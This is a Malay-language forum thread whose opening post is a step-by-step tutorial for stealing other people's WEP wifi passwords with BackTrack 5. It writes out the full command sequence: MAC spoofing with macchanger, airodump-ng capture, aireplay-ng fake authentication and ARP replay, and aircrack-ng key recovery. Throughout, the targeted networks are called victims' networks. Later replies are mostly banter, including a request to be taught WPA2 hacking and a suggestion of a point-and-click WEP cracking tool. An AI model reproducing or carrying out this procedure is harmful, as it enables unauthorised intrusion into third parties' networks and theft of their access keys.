DAFTAR
Close
Login to Your Account
Page 2 of 5 First 1234 ... Last
Results 11 to 20 of 50
  1. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #1
    Sebelum ini ada user di sini posting macam mana nak hack wifi dengan backtrack tetapi dengan versi BT yang dahulu. Kali ini, saya akan posting pasal bagaimana nak hack wifi orang dengan mendapatkan kunci akses wifi tersebut dengan menggunakan BackTrack 5.

    1. Anda boleh dapatkan salinan linux backtrack percuma melalui website BT dan muat turun versi samada 32-bit ataupun 64-bit dengan perisa antaramuka KDE ataupun Gnome.

    2. Selepas anda muat turun, burn salinan iso dalam cd ataupun jadikan pendrive anda sebagai backtrack live usb. Rujuk panduan dalam website BT untuk membuat linux live usb.

    3. Restart PC anda dan masukkan dvd/usb backtrack dan jika pc bios anda mempunyai boot selection, sila tekan butang keyboard untuk arahan masuk ke boot selection. Cth, F11 untuk ke boot selection. Dalam boot selection pula, sila tekan pada opsyen dvd/usb boot dan tunggu sehingga muncul "boot:" dan tekan enter.

    4. Kemudian, pilihan untuk boot BT melalui pelbagai cara, memtest dan juga install BT akan muncul di skrin dan jika mahu boot dari cd, pilih antara opsyen "backtrack text boot" (yang atas sekali) dan juga backtrack stealth. Ia akan ambil masa selama 4-5 minit jadi sila bersabar. Kemudian tulis "startx" untuk boot GUI.

    5. Apabila BT sudah boot up, sila pergi ke konsole /terminal (ikon berupa command prompt) dan anda perlu menulis pelbagai sintaks arahan untuk meng'hack' wifi orang.

    6. Dalam konsole/terminal, tulis arahan untuk mendapatkan senarai antaramuka network:
    Code:
    airmon-ng
    Dan ia akan menunjukkan senarai antaramuka rangkaian dan biasanya wlan0.

    7. Kemudia, jalankan arahan seperti berikut:

    Code:
    airmon-ng stop (antaramuka)
       ifconfig (antaramuka) down
      macchanger --mac 00:11:22:33:44:55 (antaramuka)
      airmon-ng start (antaramuka)
    Jika proses ini gagal, bermakna ada terdapat kesalahan dalam sintaks arahan tersebut.

    8. Untuk melihat senarai wifi yang aktif, tulis arahan spt berikut:

    Code:
    airodump-ng (antaramuka)
    dan anda dapat melihat senarai wifi yang aktif di sekitar anda. Kemudia, tekan ctrl+c dan pilihlah mana-mana wifi milik orang untuk mencuri kata laluan wifi orang.

    9. Kemudian tulis arahan ini untuk mendapatkan info tentang wifi milik orang:

    Code:
     airodump-ng -c (channel) -w (nama wifi) --bssid (bssid) (antaramuka)
    Dalam sintaks tersebut, (channel) merupakan kod channel, ch yang digunakan oleh wifi mangsa dan bssid ialah kod wifi mangsa yang ada di sebelah kiri. Contoh bssid: 00:1F:FB:2A:C3:56.

    10. Buka konsole/terminal yang baru tanpa menutup konsole/terminal yang terdahulu dan kemudian arahan macam ini:

    Code:
    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid/ nama wifi) (antaramuka)
    Tunggu sehingga muncul "Association succesful" dengan tanda smiley.

    11. Ha.....nak dekat dah...sekarang inilah masanya untuk yang ini dan tulis seperti ini:
    Code:
     aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (antaramuka)
    Dalam proses ini, anda hanya perlu berehat sebentar selepas menjalankan arahan seperti ini. Ini kerana ia akan ambil masa selama 2-3 minit untuk mengumpul data yang cukup untuk mencuri katalaluan wifi orang. Perhatikan pada #Data pada salah satu daripada tetingkap konsole/terminal dan apabila mencapai sebanyak 30000 atau lebih, terus tekan ctrl+c untuk berhenti.

    12. Selepas proses kumpul data selesai, buka tetingkap konsole/terminal yang baru dan tulis seperti ini:
    Code:
    aircrack-ng -b (bssid) (nama wifi-01.cap)
    Jika anda tidak mempunyai data yang mencukupi, aircrack memberitahu anda supaya cuba sekali lagi dan apabila berjaya, kata "KEY FOUND" muncul dan di sebelah itu adalah katalaluan bagi wifi mangsa.

    13. Untuk menguji akses ke wifi orang, anda perlu shutdown BT dan boot windows dan cuba isikan katalaluan tanpa meletakkan simbol '[', ']' dan ':'. Bagi pengguna yang mahu untuk keluar dari BT, tekan butang naga (start) dan pilih "log out" dan ia akan kembali ke command prompt sejak anda menulis "startx' di situ dan untuk sintaks shutdown spt berikut:

    Code:
    shutdown (opsyen) (masa)
    bagi mereka yang tidak tahu bagaimana untuk membuat ini, tapikan shutdown --help dan lihat pada senarainya.

    Untuk restart, taipkan:

    Code:
    shutdown -r now
    Untuk keluar terus tanpa restart, taipkan:

    Code:
    shutdown -P now
    Selamat mencuba...

    Sumber diadaptasikan dan diubahsuai dari:


    PS: Kalau ada silap, tolong beritahu saya, dan jika ada post yang lebih kurang sama dengan yang ini, tolong check balik post yang terdahulu.

  2. # ADS
    Circuit advertisement
    Join Date
    Always
    Posts
    Many
     

  3. Gempak Hardcore personant95's Avatar
    Status
    Offline
    Join Date
    Apr 2010
    Posts
    1,322
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #11
    saper terer... ajar aku hack wpa2

  4. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2010
    Posts
    160
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #12
    erm.. pkai backtrack susah... lambat..byk benda nak kene command...
    guna linux jaa.... ehehe

  5. King Of Gempak KiuT-MiuT's Avatar
    Status
    Offline
    Join Date
    Aug 2009
    Posts
    10,834
    Post Thanks / Like
    Mentioned
    69 Post(s)
    #13
    Quote @nz_srs View Post
    erm.. pkai backtrack susah... lambat..byk benda nak kene command...
    guna linux jaa.... ehehe
    backtrack is one of linux distro ~ pentest
    backtrack ade byk GUI utk tools crack wifi mcm aircrack-ng ~ gerix
    snift ~ ettercap G
    etc

  6. Gempak Hardcore personant95's Avatar
    Status
    Offline
    Join Date
    Apr 2010
    Posts
    1,322
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #14
    Quote @H-S View Post
    backtrack is one of linux distro ~ pentest
    backtrack ade byk GUI utk tools crack wifi mcm aircrack-ng ~ gerix
    snift ~ ettercap G
    etc
    pakar dah tunjuk belang...

  7. King Of Gempak KiuT-MiuT's Avatar
    Status
    Offline
    Join Date
    Aug 2009
    Posts
    10,834
    Post Thanks / Like
    Mentioned
    69 Post(s)
    #15
    Quote @personant95 View Post
    pakar dah tunjuk belang...
    H-S copy paste ape yg personant95 tulis dulu2

  8. Gempak Hardcore personant95's Avatar
    Status
    Offline
    Join Date
    Apr 2010
    Posts
    1,322
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #16
    Quote @H-S View Post
    H-S copy paste ape yg personant95 tulis dulu2
    biler lak aku ader cakap camtu

  9. Gempak SuperStar Miyu's Avatar
    Status
    Offline
    Join Date
    Nov 2009
    Posts
    861
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #17
    Quote @nz_srs View Post
    erm.. pkai backtrack susah... lambat..byk benda nak kene command...
    guna linux jaa.... ehehe
    Apa beza backtrack ngan linux

    Quote @personant95 View Post
    biler lak aku ader cakap camtu
    personant makan kepala ikan banyak sangat ni.. buat2 lupa ea..
    takpun main sabun kuat

    kalo wep, guna spoonwep pun boleh. 3 step je terus boleh dapat. 3 kali next dah settle. sesuai la bagi yang newbie, tapi dinasihatkan belajar guna terminal, baru ada foundation
    DEAR HATERS, I COULDN'T HELP BUT NOTICE THAT.... 'awesome' ends with "me" and 'ugly' starts with "u"
    聰明的女人 , 是不會為愛自殺的 。♥

  10. King Of Gempak Heliza's Avatar
    Status
    Offline
    Join Date
    Jan 2010
    Location
    Nothing Hill
    Posts
    6,138
    Post Thanks / Like
    Mentioned
    45 Post(s)
    #18
    ape korang merapu ni aku x paham
    aku baru berjinak2 dgn linux

  11. Gempak Hardcore personant95's Avatar
    Status
    Offline
    Join Date
    Apr 2010
    Posts
    1,322
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #19
    Quote @Miyu View Post
    personant makan kepala ikan banyak sangat ni.. buat2 lupa ea..
    takpun main sabun kuat
    aku difitnah.... btw, maen sabun tu aper

  12. Gempak Senior
    Status
    Offline
    Join Date
    Mar 2011
    Posts
    252
    Post Thanks / Like
    Mentioned
    0 Post(s)
    #20
    Aku tengok komen korang memanglah serabut! Kalau nak belajar, buatlah cara belajar, jangan asyik komen je tanpa cuba tutorial ini dahulu. Ini, tutorial ini ditulis oleh oleh saya, yang juga student sains komputer kat universiti terkemuka ni.

Page 2 of 5 First 1234 ... Last

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

User Tag List